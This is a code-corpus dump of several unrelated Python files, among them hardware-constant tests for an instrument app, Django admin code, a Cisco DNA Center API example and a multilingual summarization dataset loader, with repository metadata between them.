from mantarray_desktop_app import VALID_CONFIG_SETTINGS
from mantarray_desktop_app import VALID_SCRIPTING_COMMANDS
from mantarray_desktop_app import WELL_24_INDEX_TO_ADC_AND_CH_INDEX
import mantarray_file_manager.constants
import numpy as np
from xem_wrapper import DATA_FRAMES_PER_ROUND_ROBIN
def test_default_server_port_number():
assert DEFAULT_SERVER_PORT_NUMBER == 4567
def test_max_boards():
assert MAX_POSSIBLE_CONNECTED_BOARDS == 4
def test_fimrware_addresses():
assert FIRMWARE_VERSION_WIRE_OUT_ADDRESS == 0x21
assert BARCODE_SCANNER_TRIGGER_IN_ADDRESS == 0x41
assert BARCODE_SCANNER_TOP_WIRE_OUT_ADDRESS == 0x2A
assert BARCODE_SCANNER_MID_WIRE_OUT_ADDRESS == 0x2B
assert BARCODE_SCANNER_BOTTOM_WIRE_OUT_ADDRESS == 0x2C
def test_barcode_constants():
assert CLEAR_BARCODE_TRIG_BIT == 0x5
assert START_BARCODE_SCAN_TRIG_BIT == 0x6
assert BARCODE_POLL_PERIOD == 15
assert BARCODE_CONFIRM_CLEAR_WAIT_SECONDS == 0.5
assert BARCODE_GET_SCAN_WAIT_SECONDS == 6
assert CLEARED_BARCODE_VALUE == chr(0) * 12
assert NO_PLATE_DETECTED_BARCODE_VALUE == chr(21) * 12
def test_barcode_UUIDs():
assert BARCODE_VALID_UUID == uuid.UUID("22d5054a-ede2-4e94-8f74-f4ebaafde247")
assert BARCODE_INVALID_UUID == uuid.UUID("cec87db3-3181-4b84-8d5e-1643cd00b567")
assert NO_PLATE_DETECTED_UUID == uuid.UUID("e86ca1d0-2350-4e1b-ad6a-5c78a6c2ed7a")
assert BARCODE_UNREADABLE_UUID == uuid.UUID("87525976-4c98-4783-a6f2-ae34a89dace6")
def test_default_UUIDs():
assert CURI_BIO_ACCOUNT_UUID == uuid.UUID("73f52be0-368c-42d8-a1fd-660d49ba5604")
assert CURI_BIO_USER_ACCOUNT_ID == uuid.UUID("455b93eb-c78f-4494-9f73-d3291130f126")
def test_running_fifo_simulator_constants():
assert FIFO_READ_PRODUCER_SAWTOOTH_PERIOD == ((100000 // TIMESTEP_CONVERSION_FACTOR) / (2 * np.pi))
assert FIFO_SIMULATOR_DEFAULT_WIRE_OUT_VALUE == 0xFFFFFFFF
assert RAW_TO_SIGNED_CONVERSION_VALUE == 2 ** 23
assert (
FIFO_READ_PRODUCER_DATA_OFFSET == MIDSCALE_CODE + 0xB000 + FIFO_READ_PRODUCER_WELL_AMPLITUDE * 24 // 2
)
assert FIFO_READ_PRODUCER_WELL_AMPLITUDE == 0x1014
assert FIFO_READ_PRODUCER_REF_AMPLITUDE == 0x100
def test_hardware_time_constants():
assert DATA_FRAME_PERIOD == 20
assert ROUND_ROBIN_PERIOD == DATA_FRAME_PERIOD * DATA_FRAMES_PER_ROUND_ROBIN
assert REFERENCE_SENSOR_SAMPLING_PERIOD == ROUND_ROBIN_PERIOD // 4
assert CONSTRUCT_SENSOR_SAMPLING_PERIOD == ROUND_ROBIN_PERIOD
assert TIMESTEP_CONVERSION_FACTOR == 5
assert MICROSECONDS_PER_CENTIMILLISECOND == 10
assert NANOSECONDS_PER_CENTIMILLISECOND == 10 ** 4
assert MICROSECONDS_PER_MILLISECOND == 10 ** 3
def test_adc_reading_constants():
assert REFERENCE_VOLTAGE == 2.5
assert MIDSCALE_CODE == 0x800000
assert ADC_GAIN == 2
assert MILLIVOLTS_PER_VOLT == 1000
def test_sensors_and_mappings():
assert CONSTRUCT_SENSORS_PER_REF_SENSOR == 4
assert CHANNEL_INDEX_TO_24_WELL_INDEX == {
0: 0,
1: 1,
2: 4,
3: 5,
4: 8,
5: 9,
6: 12,
7: 13,
8: 16,
9: 17,
10: 20,
11: 21,
12: 7,
13: 6,
14: 3,
15: 2,
16: 15,
17: 14,
18: 11,
19: 10,
20: 23,
21: 22,
22: 19,
23: 18,
}
assert REF_INDEX_TO_24_WELL_INDEX == {
0: frozenset([0, 1, 4, 5]),
1: frozenset([8, 9, 12, 13]),
2: frozenset([16, 17, 20, 21]),
3: frozenset([2, 3, 6, 7]),
4: frozenset([10, 11, 14, 15]),
5: frozenset([18, 19, 22, 23]),
}
assert ADC_CH_TO_24_WELL_INDEX == {
0: {0: 0, 2: 1, 4: 4, 6: 5},
1: {0: 8, 2: 9, 4: 12, 6: 13},
2: {0: 16, 2: 17, 4: 20, 6: 21},
3: {6: 2, 4: 3, 2: 6, 0: 7},
4: {6: 10, 4: 11, 2: 14, 0: 15},
5: {6: 18, 4: 19, 2: 22, 0: 23},
}
assert ADC_CH_TO_IS_REF_SENSOR == {
0: {0: False, 1: True, 2: False, 3: True, 4: False, 5: True, 6: False, 7: True},
1: {0: False, 1: True, 2: False, 3: True, 4: False, 5: True, 6: False, 7: True},
2: {0: False, 1: True, 2: False, 3: True, 4: False, 5: True, 6: False, 7: True},
3: {0: False, 1: True, 2: False, 3: True, 4: False, 5: True, 6: False, 7: True},
4: {0: False, 1: True, 2: False, 3: True, 4: False, 5: True, 6: False, 7: True},
5: {0: False, 1: True, 2: False, 3: True, 4: False, 5: True, 6: False, 7: True},
}
for well_idx in range(24):
adc_num, ch_num = WELL_24_INDEX_TO_ADC_AND_CH_INDEX[well_idx]
assert ADC_CH_TO_24_WELL_INDEX[adc_num][ch_num] == well_idx
def test_current_file_versions():
latest_beta1_hdf5_file_format_version = (
mantarray_file_manager.constants.CURRENT_BETA1_HDF5_FILE_FORMAT_VERSION
)
assert (
CURRENT_BETA1_HDF5_FILE_FORMAT_VERSION == latest_beta1_hdf5_file_format_version
), "FileWriterProcess needs an update to match the beta 1 file format with the latest file version from mantarray-file-manager. Make the changes then update CURRENT_BETA1_HDF5_FILE_FORMAT_VERSION to match the latest version"
latest_beta2_hdf5_file_format_version = (
mantarray_file_manager.constants.CURRENT_BETA2_HDF5_FILE_FORMAT_VERSION
)
assert (
CURRENT_BETA2_HDF5_FILE_FORMAT_VERSION == latest_beta2_hdf5_file_format_version
), "FileWriterProcess needs an update to match the beta 2 file format with the latest file version from mantarray-file-manager. Make the changes then update CURRENT_BETA2_HDF5_FILE_FORMAT_VERSION to match the latest version"
def test_COMPILED_EXE_BUILD_TIMESTAMP():
assert COMPILED_EXE_BUILD_TIMESTAMP == "REPLACETHISWITHTIMESTAMPDURINGBUILD"
def test_CURRENT_SOFTWARE_VERSION():
assert CURRENT_SOFTWARE_VERSION == "REPLACETHISWITHVERSIONDURINGBUILD"
def test_managed_acquisition_commands():
assert START_MANAGED_ACQUISITION_COMMUNICATION == {
"communication_type": "acquisition_manager",
"command": "start_managed_acquisition",
}
assert STOP_MANAGED_ACQUISITION_COMMUNICATION == {
"communication_type": "acquisition_manager",
"command": "stop_managed_acquisition",
}
def test_scripting():
assert VALID_SCRIPTING_COMMANDS == frozenset(
[
"begin_hardware_script",
"end_hardware_script",
"set_wire_in",
"read_wire_out",
"activate_trigger_in",
"comm_delay",
"start_calibration",
]
)
assert ADC_GAIN_DESCRIPTION_TAG == "adc_gain_setting"
assert ADC_OFFSET_DESCRIPTION_TAG == "adc_offset_reading"
def test_buffer_size_constants():
assert MIN_NUM_SECONDS_NEEDED_FOR_ANALYSIS == 7
assert DATA_ANALYZER_BUFFER_SIZE_CENTIMILLISECONDS == 700000
assert FILE_WRITER_BUFFER_SIZE_CENTIMILLISECONDS == 3000000
assert OUTGOING_DATA_BUFFER_SIZE == 2
assert (
DATA_ANALYZER_BETA_1_BUFFER_SIZE == DATA_ANALYZER_BUFFER_SIZE_CENTIMILLISECONDS // ROUND_ROBIN_PERIOD
)
def test_performance_logging_constants():
assert INSTRUMENT_COMM_PERFOMANCE_LOGGING_NUM_CYCLES == 20
assert FILE_WRITER_PERFOMANCE_LOGGING_NUM_CYCLES == 2000
def test_system_status_uuids():
assert SERVER_INITIALIZING_STATE == "server_initializing"
assert SERVER_READY_STATE == "server_ready"
assert INSTRUMENT_INITIALIZING_STATE == "instrument_initializing"
assert CALIBRATION_NEEDED_STATE == "calibration_needed"
assert CALIBRATING_STATE == "calibrating"
assert CALIBRATED_STATE == "calibrated"
assert BUFFERING_STATE == "buffering"
assert LIVE_VIEW_ACTIVE_STATE == "live_view_active"
assert RECORDING_STATE == "recording"
assert SYSTEM_STATUS_UUIDS == {
SERVER_INITIALIZING_STATE: uuid.UUID("04471bcf-1a00-4a0d-83c8-4160622f9a25"),
SERVER_READY_STATE: uuid.UUID("8e24ef4d-2353-4e9d-aa32-4346126e73e3"),
INSTRUMENT_INITIALIZING_STATE: uuid.UUID("d2e3d386-b760-4c9a-8b2d-410362ff11c4"),
CALIBRATION_NEEDED_STATE: uuid.UUID("009301eb-625c-4dc4-9e92-1a4d0762465f"),
CALIBRATING_STATE: uuid.UUID("43c08fc5-ca2f-4dcd-9dff-5e9324cb5dbf"),
CALIBRATED_STATE: uuid.UUID("b480373b-9466-4fa0-92a6-fa5f8e340d30"),
BUFFERING_STATE: uuid.UUID("dc774d4b-6bd1-4717-b36e-6df6f1ef6cf4"),
LIVE_VIEW_ACTIVE_STATE: uuid.UUID("9fbee58e-c6af-49a5-b2e2-5b085eead2ea"),
RECORDING_STATE: uuid.UUID("1e3d76a2-508d-4c99-8bf5-60dac5cc51fe"),
}
def test_user_config():
assert DEFAULT_USER_CONFIG == {
"Customer Account ID": "",
"User Account ID": "",
}
assert VALID_CONFIG_SETTINGS == frozenset(
["customer_account_uuid", "user_account_uuid", "recording_directory"]
)
def test_shutdown_values():
assert SUBPROCESS_SHUTDOWN_TIMEOUT_SECONDS == 1
assert SUBPROCESS_POLL_DELAY_SECONDS == 0.025
def test_parallelism_config():
assert SECONDS_TO_WAIT_WHEN_POLLING_QUEUES == 0.02
def test_serial_comm():
assert STM_VID == 1155
assert SERIAL_COMM_BAUD_RATE == int(5e6)
assert MAX_MC_REBOOT_DURATION_SECONDS == 5
assert SERIAL_COMM_NUM_ALLOWED_MISSED_HANDSHAKES == 3
assert SERIAL_COMM_TIMESTAMP_EPOCH == datetime.datetime(
year=2021, month=1, day=1, tzinfo=datetime.timezone.utc
)
assert SERIAL_COMM_STATUS_BEACON_PERIOD_SECONDS == 5
assert SERIAL_COMM_HANDSHAKE_PERIOD_SECONDS == 5
assert SERIAL_COMM_RESPONSE_TIMEOUT_SECONDS == 5
assert SERIAL_COMM_HANDSHAKE_TIMEOUT_SECONDS == 6
assert SERIAL_COMM_STATUS_BEACON_TIMEOUT_SECONDS == 7
assert SERIAL_COMM_REGISTRATION_TIMEOUT_SECONDS == 8
assert SERIAL_COMM_MAGIC_WORD_BYTES == b"CURI BIO"
assert SERIAL_COMM_PACKET_INFO_LENGTH_BYTES == 2
assert SERIAL_COMM_TIMESTAMP_LENGTH_BYTES == 8
assert SERIAL_COMM_TIME_INDEX_LENGTH_BYTES == 8
assert SERIAL_COMM_TIME_OFFSET_LENGTH_BYTES == 2
assert SERIAL_COMM_CHECKSUM_LENGTH_BYTES == 4
assert SERIAL_COMM_STATUS_CODE_LENGTH_BYTES == 4
assert SERIAL_COMM_MAX_PACKET_LENGTH_BYTES == 2 ** 16
assert SERIAL_COMM_MAX_DATA_LENGTH_BYTES == (
SERIAL_COMM_MAX_PACKET_LENGTH_BYTES
- SERIAL_COMM_PACKET_INFO_LENGTH_BYTES
- SERIAL_COMM_TIMESTAMP_LENGTH_BYTES
- SERIAL_COMM_CHECKSUM_LENGTH_BYTES
- 10
)
assert SERIAL_COMM_MIN_PACKET_BODY_SIZE_BYTES == (
SERIAL_COMM_TIMESTAMP_LENGTH_BYTES
+ SERIAL_COMM_PACKET_INFO_LENGTH_BYTES
+ SERIAL_COMM_CHECKSUM_LENGTH_BYTES
)
assert (
SERIAL_COMM_MIN_FULL_PACKET_LENGTH_BYTES
== SERIAL_COMM_MIN_PACKET_BODY_SIZE_BYTES
+ SERIAL_COMM_PACKET_INFO_LENGTH_BYTES
+ len(SERIAL_COMM_MAGIC_WORD_BYTES)
)
assert SERIAL_COMM_MAX_TIMESTAMP_VALUE == 2 ** (8 * SERIAL_COMM_TIMESTAMP_LENGTH_BYTES) - 1
assert (
SERIAL_COMM_TIMESTAMP_BYTES_INDEX
== len(SERIAL_COMM_MAGIC_WORD_BYTES) + SERIAL_COMM_PACKET_INFO_LENGTH_BYTES
)
assert SERIAL_COMM_MODULE_ID_INDEX == 18
assert SERIAL_COMM_PACKET_TYPE_INDEX == 19
assert SERIAL_COMM_ADDITIONAL_BYTES_INDEX == 20
assert SERIAL_COMM_MAIN_MODULE_ID == 0
assert SERIAL_COMM_STATUS_BEACON_PACKET_TYPE == 0
assert SERIAL_COMM_MAGNETOMETER_DATA_PACKET_TYPE == 1
assert SERIAL_COMM_SIMPLE_COMMAND_PACKET_TYPE == 3
assert SERIAL_COMM_COMMAND_RESPONSE_PACKET_TYPE == 4
assert SERIAL_COMM_HANDSHAKE_PACKET_TYPE == 4
assert SERIAL_COMM_PLATE_EVENT_PACKET_TYPE == 6
assert SERIAL_COMM_STIM_STATUS_PACKET_TYPE == 7
assert SERIAL_COMM_SET_STIM_PROTOCOL_PACKET_TYPE == 20
assert SERIAL_COMM_START_STIM_PACKET_TYPE == 21
assert SERIAL_COMM_STOP_STIM_PACKET_TYPE == 22
assert SERIAL_COMM_CHECKSUM_FAILURE_PACKET_TYPE == 255
assert SERIAL_COMM_REBOOT_COMMAND_BYTE == 0
assert SERIAL_COMM_MAGNETOMETER_CONFIG_COMMAND_BYTE == 1
assert SERIAL_COMM_START_DATA_STREAMING_COMMAND_BYTE == 2
assert SERIAL_COMM_STOP_DATA_STREAMING_COMMAND_BYTE == 3
assert SERIAL_COMM_GET_METADATA_COMMAND_BYTE == 6
assert SERIAL_COMM_DUMP_EEPROM_COMMAND_BYTE == 7
assert SERIAL_COMM_SET_TIME_COMMAND_BYTE == 8
assert SERIAL_COMM_SET_NICKNAME_COMMAND_BYTE == 9
assert SERIAL_COMM_COMMAND_SUCCESS_BYTE == 0
assert SERIAL_COMM_COMMAND_FAILURE_BYTE == 1
assert SERIAL_COMM_METADATA_BYTES_LENGTH == 32
assert SERIAL_COMM_IDLE_READY_CODE == 0
assert SERIAL_COMM_TIME_SYNC_READY_CODE == 1
assert SERIAL_COMM_HANDSHAKE_TIMEOUT_CODE == 2
assert SERIAL_COMM_BOOT_UP_CODE == 3
assert SERIAL_COMM_FATAL_ERROR_CODE == 4
assert SERIAL_COMM_SOFT_ERROR_CODE == 5
assert SERIAL_COMM_NUM_DATA_CHANNELS == 9
assert SERIAL_COMM_NUM_CHANNELS_PER_SENSOR == 3
assert SERIAL_COMM_NUM_SENSORS_PER_WELL == 3
assert (
SERIAL_COMM_NUM_DATA_CHANNELS
== SERIAL_COMM_NUM_CHANNELS_PER_SENSOR * SERIAL_COMM_NUM_SENSORS_PER_WELL
)
assert SERIAL_COMM_DEFAULT_DATA_CHANNEL == SERIAL_COMM_SENSOR_AXIS_LOOKUP_TABLE["A"]["X"]
assert DEFAULT_SAMPLING_PERIOD == 10000
for module_id in range(1, 25):
assert DEFAULT_MAGNETOMETER_CONFIG[module_id] == {
SERIAL_COMM_SENSOR_AXIS_LOOKUP_TABLE["A"]["X"]: True,
SERIAL_COMM_SENSOR_AXIS_LOOKUP_TABLE["A"]["Y"]: True,
SERIAL_COMM_SENSOR_AXIS_LOOKUP_TABLE["A"]["Z"]: True,
SERIAL_COMM_SENSOR_AXIS_LOOKUP_TABLE["B"]["X"]: True,
SERIAL_COMM_SENSOR_AXIS_LOOKUP_TABLE["B"]["Y"]: True,
SERIAL_COMM_SENSOR_AXIS_LOOKUP_TABLE["B"]["Z"]: True,
SERIAL_COMM_SENSOR_AXIS_LOOKUP_TABLE["C"]["X"]: True,
SERIAL_COMM_SENSOR_AXIS_LOOKUP_TABLE["C"]["Y"]: True,
SERIAL_COMM_SENSOR_AXIS_LOOKUP_TABLE["C"]["Z"]: True,
}
assert STIM_MAX_ABSOLUTE_CURRENT_MICROAMPS == int(100e3)
assert STIM_MAX_ABSOLUTE_VOLTAGE_MILLIVOLTS == int(1.2e3)
assert STIM_MAX_PULSE_DURATION_MICROSECONDS == int(50e3)
assert STIM_COMPLETE_SUBPROTOCOL_IDX == 255
assert STIM_NO_PROTOCOL_ASSIGNED == 255
assert issubclass(StimStatuses, IntEnum) is True
assert StimStatuses.ACTIVE == 0
assert StimStatuses.NULL == 1
assert StimStatuses.RESTARTING == 2
assert StimStatuses.FINISHED == 3
assert StimStatuses.ERROR == 4
def test_cython_constants():
assert SERIAL_COMM_MAGIC_WORD_LENGTH_BYTES_CY == len(SERIAL_COMM_MAGIC_WORD_BYTES)
assert SERIAL_COMM_NUM_CHANNELS_PER_SENSOR_CY == SERIAL_COMM_NUM_CHANNELS_PER_SENSOR
def test_beta_2_mappings():
assert SERIAL_COMM_SENSOR_AXIS_LOOKUP_TABLE == {
"A": {"X": 0, "Y": 1, "Z": 2},
"B": {"X": 3, "Y": 4, "Z": 5},
"C": {"X": 6, "Y": 7, "Z": 8},
}
assert SERIAL_COMM_WELL_IDX_TO_MODULE_ID == {
well_idx: module_id for module_id, well_idx in SERIAL_COMM_MODULE_ID_TO_WELL_IDX.items()
}
assert SERIAL_COMM_MODULE_ID_TO_WELL_IDX == {
module_id: (module_id - 1) % 6 * 4 + (module_id - 1) // 6 for module_id in range(1, 25)
}
for well_idx in range(24):
module_id = SERIAL_COMM_WELL_IDX_TO_MODULE_ID[well_idx]
well_idx_from_module_id = SERIAL_COMM_MODULE_ID_TO_WELL_IDX[module_id]
assert well_idx_from_module_id == well_idx
| 45.767528
| 228
| 0.804886
|
4e8249cc4359ee69945ec99c2d2b5f6be3bd91f7
| 94
|
py
|
Python
|
apps.py
|
lowryel/Blog
|
964af1d6574b33cf9781ecfa162ab1362f89784c
|
[
"Apache-2.0"
] | null | null | null |
apps.py
|
lowryel/Blog
|
964af1d6574b33cf9781ecfa162ab1362f89784c
|
[
"Apache-2.0"
] | null | null | null |
apps.py
|
lowryel/Blog
|
964af1d6574b33cf9781ecfa162ab1362f89784c
|
[
"Apache-2.0"
] | null | null | null |
from django.apps import AppConfig
class TourappConfig(AppConfig):
name = 'tourapp'
| 15.666667
| 34
| 0.712766
|
8f688b7fd32e5022ba85cf023e3cad122469d5a9
| 963
|
py
|
Python
|
letter/admin.py
|
watchdogpolska/django-civil-list
|
f486d9a8595bcfa3b402e608324f79f793f8e960
|
[
"BSD-3-Clause"
] | null | null | null |
letter/admin.py
|
watchdogpolska/django-civil-list
|
f486d9a8595bcfa3b402e608324f79f793f8e960
|
[
"BSD-3-Clause"
] | 1
|
2015-08-04T14:24:10.000Z
|
2015-08-04T14:24:10.000Z
|
letter/admin.py
|
watchdogpolska/django-civil-list
|
f486d9a8595bcfa3b402e608324f79f793f8e960
|
[
"BSD-3-Clause"
] | null | null | null |
from django import forms
from django.contrib import admin
# Register your models here.
from .models import Category, Person, Letter
from ckeditor.widgets import CKEditorWidget
class CategoryAdmin(admin.ModelAdmin):
list_display = (u'id', 'name')
search_fields = ('name',)
admin.site.register(Category, CategoryAdmin)
class PersonAdmin(admin.ModelAdmin):
list_display = (u'id', 'name', 'email', 'category')
list_filter = ('category',)
search_fields = ('name',)
admin.site.register(Person, PersonAdmin)
class LetterAdminForm(forms.ModelForm):
content = forms.CharField(widget=CKEditorWidget())
class Meta:
fields = ('id', 'name', 'title', 'content', 'category')
model = Letter
class LetterAdmin(admin.ModelAdmin):
list_display = (u'id', 'name', 'title', 'content', 'category')
list_filter = ('category',)
search_fields = ('name',)
form = LetterAdminForm
admin.site.register(Letter, LetterAdmin)
| 26.75
| 66
| 0.697819
|
bb4fe4add4ad61cf57f220fc4fbd3feb77614ae3
| 161
|
py
|
Python
|
alvi/tests/pages/home.py
|
alviproject/alvi
|
ec77919a546c11c46b178a21236792f8b0d95cbd
|
[
"MIT"
] | 10
|
2015-06-01T09:11:33.000Z
|
2018-03-02T13:52:46.000Z
|
alvi/tests/pages/home.py
|
alviproject/alvi
|
ec77919a546c11c46b178a21236792f8b0d95cbd
|
[
"MIT"
] | null | null | null |
alvi/tests/pages/home.py
|
alviproject/alvi
|
ec77919a546c11c46b178a21236792f8b0d95cbd
|
[
"MIT"
] | 5
|
2015-09-17T17:34:16.000Z
|
2019-09-04T10:50:29.000Z
|
from selenium.webdriver.common.by import By
from . import base
class Home(base.Page):
scene_links = base.make_elements(By.CSS_SELECTOR, "ul.scenes li a")
| 20.125
| 71
| 0.751553
|
b275a83d1ad8ab51060de85b662828f6f4f3363f
| 4,146
|
py
|
Python
|
intro-dnac/dnac-nbapi-hello-world/dnac-nbapi-hello-world.py
|
borisski/dnav3-code
|
9e12accb5be7e66fff5aabfdebc5ef282c687351
|
[
"MIT"
] | 1
|
2020-07-25T09:24:38.000Z
|
2020-07-25T09:24:38.000Z
|
intro-dnac/dnac-nbapi-hello-world/dnac-nbapi-hello-world.py
|
borisski/dnav3-code
|
9e12accb5be7e66fff5aabfdebc5ef282c687351
|
[
"MIT"
] | 8
|
2020-02-05T14:17:32.000Z
|
2021-09-23T23:27:46.000Z
|
intro-dnac/dnac-nbapi-hello-world/dnac-nbapi-hello-world.py
|
ljm625/dnav3-code
|
833c2c05401fbe84529d51dc1eb597c10b6615c9
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""DNAv3 - DNAC Northbound API - Hands on exercise 01
In this exercise we create helper functions to get an auth token
from DNAC - get_auth_token() and also get_url(), create_url() and
list_network_devices() to get a list of all network devices managed
by DNA Center. In the main function we extract some data we find useful
and pretty print the result.
Copyright (c) 2018 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import os
import sys
import json
import requests
from requests.auth import HTTPBasicAuth
requests.packages.urllib3.disable_warnings()
# Get the absolute path for the directory where this file is located "here"
here = os.path.abspath(os.path.dirname(__file__))
# Get the absolute path for the project / repository root
project_root = os.path.abspath(os.path.join(here, "../.."))
# Extend the system path to include the project root and import the env files
sys.path.insert(0, project_root)
import env_lab # noqa
#import env_user # noqa
DNAC = env_lab.DNA_CENTER['host']
DNAC_USER = env_lab.DNA_CENTER['username']
DNAC_PASSWORD = env_lab.DNA_CENTER['password']
DNAC_PORT = env_lab.DNA_CENTER['port']
# -------------------------------------------------------------------
# Helper functions
# -------------------------------------------------------------------
def get_auth_token(controller_ip=DNAC, username=DNAC_USER, password=DNAC_PASSWORD):
""" Authenticates with controller and returns a token to be used in subsequent API invocations
"""
login_url = "https://{0}/dna/system/api/v1/auth/token".format(controller_ip, DNAC_PORT)
result = requests.post(url=login_url, auth=HTTPBasicAuth(DNAC_USER, DNAC_PASSWORD), verify=False)
result.raise_for_status()
token = result.json()["Token"]
return {
"controller_ip": controller_ip,
"token": token
}
def create_url(path, controller_ip=DNAC):
""" Helper function to create a DNAC API endpoint URL
"""
return "https://%s/dna/intent/api/v1/%s" % (controller_ip, path)
def get_url(url):
url = create_url(path=url)
print(url)
token = get_auth_token()
headers = {'X-auth-token' : token['token']}
try:
response = requests.get(url, headers=headers, verify=False)
except requests.exceptions.RequestException as cerror:
print("Error processing request", cerror)
sys.exit(1)
return response.json()
def list_network_devices():
return get_url("network-device")
if __name__ == "__main__":
response = list_network_devices()
print("{0:42}{1:17}{2:12}{3:18}{4:12}{5:16}{6:15}".
format("hostname","mgmt IP","serial",
"platformId","SW Version","role","Uptime"))
for device in response['response']:
uptime = "N/A" if device['upTime'] is None else device['upTime']
print("{0:42}{1:17}{2:12}{3:18}{4:12}{5:16}{6:15}".
format(device['hostname'],
device['managementIpAddress'],
device['serialNumber'],
device['platformId'],
device['softwareVersion'],
device['role'],uptime))
| 37.017857
| 101
| 0.686686
|
ddd97ca973f7195e13786da55465bb43b53f019b
| 5,388
|
py
|
Python
|
datasets/xlsum/xlsum.py
|
xcfcode/DataLab
|
d1a310de4986cb704b1fe3dea859452b8c14fc71
|
[
"Apache-2.0"
] | null | null | null |
datasets/xlsum/xlsum.py
|
xcfcode/DataLab
|
d1a310de4986cb704b1fe3dea859452b8c14fc71
|
[
"Apache-2.0"
] | null | null | null |
datasets/xlsum/xlsum.py
|
xcfcode/DataLab
|
d1a310de4986cb704b1fe3dea859452b8c14fc71
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2022 The HuggingFace datasets Authors, DataLab Authors and the current dataset script contributor.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""XL-Sum abstractive summarization dataset."""
import json
import os
import datalabs
from datalabs.tasks import Summarization
_CITATION = """\
@inproceedings{hasan-etal-2021-xl,
title = "{XL}-Sum: Large-Scale Multilingual Abstractive Summarization for 44 Languages",
author = "Hasan, Tahmid and
Bhattacharjee, Abhik and
Islam, Md. Saiful and
Mubasshir, Kazi and
Li, Yuan-Fang and
Kang, Yong-Bin and
Rahman, M. Sohel and
Shahriyar, Rifat",
booktitle = "Findings of the Association for Computational Linguistics: ACL-IJCNLP 2021",
month = aug,
year = "2021",
address = "Online",
publisher = "Association for Computational Linguistics",
url = "https://aclanthology.org/2021.findings-acl.413",
pages = "4693--4703",
}
"""
_DESCRIPTION = """\
We present XLSum, a comprehensive and diverse dataset comprising 1.35 million professionally
annotated article-summary pairs from BBC, extracted using a set of carefully designed heuristics.
The dataset covers 45 languages ranging from low to high-resource, for many of which no
public dataset is currently available. XL-Sum is highly abstractive, concise,
and of high quality, as indicated by human and intrinsic evaluation.
"""
_HOMEPAGE = "https://github.com/csebuetnlp/xl-sum"
_LICENSE = "Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License (CC BY-NC-SA 4.0)"
_URL = "https://huggingface.co/datasets/csebuetnlp/xlsum/resolve/main/data/{}_XLSum_v{}.tar.bz2"
_LANGUAGES = [
"oromo",
"french",
"amharic",
"arabic",
"azerbaijani",
"bengali",
"burmese",
"chinese_simplified",
"chinese_traditional",
"welsh",
"english",
"kirundi",
"gujarati",
"hausa",
"hindi",
"igbo",
"indonesian",
"japanese",
"korean",
"kyrgyz",
"marathi",
"spanish",
"scottish_gaelic",
"nepali",
"pashto",
"persian",
"pidgin",
"portuguese",
"punjabi",
"russian",
"serbian_cyrillic",
"serbian_latin",
"sinhala",
"somali",
"swahili",
"tamil",
"telugu",
"thai",
"tigrinya",
"turkish",
"ukrainian",
"urdu",
"uzbek",
"vietnamese",
"yoruba",
]
class Xlsum(datalabs.GeneratorBasedBuilder):
VERSION = datalabs.Version("2.0.0")
BUILDER_CONFIGS = [
datalabs.BuilderConfig(
name="{}".format(lang),
version=datalabs.Version("2.0.0")
)
for lang in _LANGUAGES
]
def _info(self):
return datalabs.DatasetInfo(
description=_DESCRIPTION,
features=datalabs.Features(
{
"id": datalabs.Value("string"),
"url": datalabs.Value("string"),
"title": datalabs.Value("string"),
"summary": datalabs.Value("string"),
"text": datalabs.Value("string"),
}
),
supervised_keys=None,
homepage=_HOMEPAGE,
citation=_CITATION,
license=_LICENSE,
version=self.VERSION,
task_templates=[Summarization(
text_column="text",
summary_column="summary"),
],
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
lang = str(self.config.name)
url = _URL.format(lang, self.VERSION.version_str[:-2])
data_dir = dl_manager.download_and_extract(url)
return [
datalabs.SplitGenerator(
name=datalabs.Split.TRAIN,
gen_kwargs={
"filepath": os.path.join(data_dir, lang + "_train.jsonl"),
},
),
datalabs.SplitGenerator(
name=datalabs.Split.TEST,
gen_kwargs={
"filepath": os.path.join(data_dir, lang + "_test.jsonl"),
},
),
datalabs.SplitGenerator(
name=datalabs.Split.VALIDATION,
gen_kwargs={
"filepath": os.path.join(data_dir, lang + "_val.jsonl"),
},
),
]
def _generate_examples(self, filepath):
"""Yields examples as (key, example) tuples."""
with open(filepath, encoding="utf-8") as f:
for idx_, row in enumerate(f):
data = json.loads(row)
yield idx_, {
"id": data["id"],
"url": data["url"],
"title": data["title"],
"summary": data["summary"],
"text": data["text"],
}
| 30.788571
| 110
| 0.584076
|
752561c0080e8b2bf085141977a3a20bddfe3986
| 716
|
py
|
Python
|
tests/test_pipeline/components/regression/test_gradient_boosting.py
|
jianzhnie/AutoTabular
|
fb407300adf97532a26d33f7442d2a606fa30512
|
[
"Apache-2.0"
] | 48
|
2021-09-06T08:09:26.000Z
|
2022-03-28T13:02:54.000Z
|
tests/test_pipeline/components/regression/test_gradient_boosting.py
|
Fanxingye/Autotabular
|
d630c78290a52f8c73885afb16884e18135c34f6
|
[
"Apache-2.0"
] | null | null | null |
tests/test_pipeline/components/regression/test_gradient_boosting.py
|
Fanxingye/Autotabular
|
